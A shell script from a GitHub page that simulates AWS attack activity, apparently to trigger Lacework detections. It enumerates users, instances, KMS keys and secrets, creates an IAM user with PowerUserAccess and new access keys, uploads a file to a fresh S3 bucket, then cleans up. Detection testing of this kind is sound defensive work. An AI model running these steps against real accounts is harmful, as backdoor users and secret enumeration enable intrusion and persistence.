-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathaws_lateral_movement.sh
120 lines (101 loc) · 4.65 KB
/
aws_lateral_movement.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
#!/bin/sh
# Sample AWS exploit
# 1. Conducts reconnaissance by listing users, EC2 instances, KMS Keys, Security Groups
# 2. Creates a new user with power user privileges, then creates an S3 bucket and puts a file into it.
# 3. The script then cleans up after itself, deleting the bucket and the user.
# Accepts a first optional argument for the username that gets created, otherwise defaults to 'exfiltest'
# Accepts a second optional argument for the AWS profile, otherwise defaults to 'default'
# eg. sh ./aws_lateral_movement baduser myawsprofile
set -e
red=$'\e[1;31m'
grn=$'\e[1;32m'
yel=$'\e[1;33m'
blu=$'\e[1;34m'
mag=$'\e[1;35m'
cyn=$'\e[1;36m'
end=$'\e[0m'
AWSREGION=ap-southeast-2
USERNAME=${1:-baduser}
PROFILE=${2:-default}
NEW_PROFILE=exfilprofile
function getRegions {
aws --profile $PROFILE ec2 describe-regions --output json | jq -r '.[] | .[] | .RegionName'
}
function getInstances {
aws --profile $PROFILE ec2 describe-instances --query 'Reservations[*].Instances[*].[InstanceId]' --filters Name=instance-state-name,Values=running,stopped --region $r --output json --no-paginate | jq 'flatten | length'
}
function getKMSKeys {
aws --profile $PROFILE kms list-keys --region $r --output json | jq
}
function getEC2SecurityGroups {
aws --profile $PROFILE ec2 describe-security-groups --region $r --output json | jq
}
function getDBSecurityGroups {
aws --profile $PROFILE rds describe-security-groups --region $r --query 'DBSecurityGroups[*].EC2SecurityGroups[*].EC2SecurityGroupId' --output json | jq
}
function getSecrets {
aws --profile $PROFILE secretsmanager list-secrets --region $r --output json | jq
}
function getUsers {
aws --profile $PROFILE iam list-users --output json | jq
}
function awsRecon {
echo "${grn}Conducting AWS reconnaissance...${end}"
# Querying AWS for list of users
echo " ${grn}Querying AWS for list of users...${end}"
Users=$(getUsers $PROFILE)
#echo "Users: $Users"
# Querying each AWS region to list EC2 Instances, KMS Keys, EC2 Security Groups and Secrets
echo " ${grn}Querying each AWS region for EC2 Instances, KMS Keys, EC2 Security Groups and Secrets...${end}"
#echo ""
for r in $(getRegions); do
echo " Querying region: ${cyn}$r${end}"
Instances=$(getInstances $r $PROFILE)
#echo "Instances: $Instances"
KMSKeys=$(getKMSKeys $r $PROFILE)
#echo "KMSKeys: $KMSKeys"
EC2SecurityGroups==$(getEC2SecurityGroups $r $PROFILE)
#echo "SecurityGroups: $SecurityGroups"
Secrets=$(getSecrets $r $PROFILE)
#echo "Secrets: $Secrets"
done
echo "${grn}AWS reconnaissance complete${end}"
}
# Conduct example AWS Reconnaisance
awsRecon
# Create a new IAM user
echo "${grn}Creating a new IAM user called ${mag}$USERNAME${end}..."
echo ""
aws iam create-user --user-name $USERNAME --profile $PROFILE | jq
aws iam create-access-key --user-name $USERNAME --profile $PROFILE > creds.json
echo ""
echo "${grn}Granting PowerUser access to ${mag}$USERNAME${end}..."
aws iam attach-user-policy --user-name $USERNAME --profile $PROFILE --policy-arn arn:aws:iam::aws:policy/PowerUserAccess
export KEY=$(cat creds.json | jq -r .AccessKey.AccessKeyId)
export SECRET=$(cat creds.json | jq -r .AccessKey.SecretAccessKey)
# Here we start using the new account profile and creds
echo ""
echo "${grn}Creating a new S3 bucket...${end}"
aws configure set aws_access_key_id "$KEY" --profile $NEW_PROFILE
aws configure set aws_secret_access_key "$SECRET" --profile $NEW_PROFILE
sleep 10
BUCKETNAME="exploit$RANDOM"
aws s3api create-bucket --bucket $BUCKETNAME --region $AWSREGION --create-bucket-configuration LocationConstraint=$AWSREGION --profile $NEW_PROFILE | jq
echo ""
echo "${grn}Uploading file to the bucket...${end}"
curl -H "Accept: application/json" https://icanhazdadjoke.com/ > badfile.json
aws s3api put-object --bucket $BUCKETNAME --key badfile.json --body badfile.json --profile $NEW_PROFILE | jq
echo ""
echo "${grn}Data uploaded. Preparing to clean up...${end}"
sleep 10
echo "${grn}Deleting file and S3 bucket...${end}"
aws s3api delete-object --bucket $BUCKETNAME --key badfile.json --profile $NEW_PROFILE
aws s3api delete-bucket --bucket $BUCKETNAME --profile $NEW_PROFILE
# Exit back out to our regular context
echo "${grn}Deleting access key and IAM user ${mag}$USERNAME${end}..."
aws iam detach-user-policy --user-name $USERNAME --profile $PROFILE --policy-arn arn:aws:iam::aws:policy/PowerUserAccess
aws iam delete-access-key --access-key-id $KEY --user-name $USERNAME --profile $PROFILE
aws iam delete-user --user-name $USERNAME --profile $PROFILE
rm creds.json
echo ""
echo "${cyn}Script complete. Check your Lacework console for activity in about an hour.${end}"